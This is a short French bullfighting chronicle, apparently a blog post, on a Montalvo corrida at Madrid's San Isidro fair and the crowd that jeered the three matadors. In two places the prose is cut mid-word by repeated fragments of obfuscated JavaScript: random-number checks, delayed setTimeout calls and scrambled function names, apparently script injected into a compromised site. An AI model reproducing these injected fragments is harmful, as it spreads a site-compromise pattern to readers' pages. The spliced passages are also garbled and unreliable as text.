SCHIZOPHRENIE TOTALE

San Isidro. 15 mai. Dans les arènes de Madrid il y a deux publics. Un qui boycotte toros et toreros, un autre qui va voir toréer. Le premier est formé par des aficionados intégristes qui n’y connaissent rien et le second c’est comme le public de toutes les arènes, avec des aficionados et des spectateurs. Le premier aime que les toreros se croisent à n’importe quel moment et devant n’importe quel toro, ce qui n’est pas toujours recommandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andable.

Pour eux, tous les toreros sont « en dehors » du passage du toro, un « avantage » taurinement impératif après la première passe de muleta, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le torero cherche à enchaîner les passes. Si les toreros se plaçaient au milieu, ils seraient encornés. Une demi-arène a vu la corrida sous ce prisme intégriste stupide. L’autre moitié a dû les supporter. Soyons clairs. La corrida de Montalvo, protestée par les intégristes, était bien présentée : trois toros avec beaucoup de potentiel, 3ème, 4ème et 6ème, deux qui dans d’autres arènes auraient donné plus de jeu, 1er et 2ème et un mauvais sans palliatifs, le 5ème. Dans ces conditions, Curro Díaz a été bien pendant la corrida, il a toréé avec du temple et de l’élégance à la véronique et à son second il lui a endosse plusieurs séries de naturelles exquises. Mais il a mal tué. Paco Ureña affronta avec sincérité l’agressivité de son premier et fut attrapé spectaculairement contre les planches en recevant son second. Il eut le mérite de rester en piste. Alberto López Simón a été mal, maladroit et vulgaire devant deux bons toros. Les trois toreros ont été méprisés par les intégristes dans ces arènes qui sont aujourd’hui les plus antipathiques au monde.

 

Les commentaires sont fermés.